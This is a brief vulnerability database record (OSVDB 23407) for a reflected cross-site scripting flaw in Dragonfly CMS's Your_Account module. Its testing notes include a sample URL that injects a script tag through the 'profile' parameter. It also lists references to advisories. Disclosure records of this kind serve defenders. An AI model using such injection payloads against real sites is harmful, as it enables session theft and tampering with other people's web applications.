CPG Dragonfly CMS Your_Account Module profile Variable XSS

2005-03-29T13:20:10
ID OSVDB:23407
Type osvdb
Reporter OSVDB
Modified 2005-03-29T13:20:10

Description

Manual Testing Notes

http://[target]/index.php?name=Your_Account&profile=anyone"><script>alert('foo')</script>

References:

Vendor URL: http://www.cpgnuke.com/
Vendor Specific News/Changelog Entry: http://dragonflycms.org/Forums/viewtopic/t=14751.html
Security Tracker: 1013573
Secunia Advisory ID: 14748
Related OSVDB ID: 15089
Related OSVDB ID: 23406
Related OSVDB ID: 15090
Other Advisory URL: http://www.securiteam.com/unixfocus/5LP0L2KF5Q.html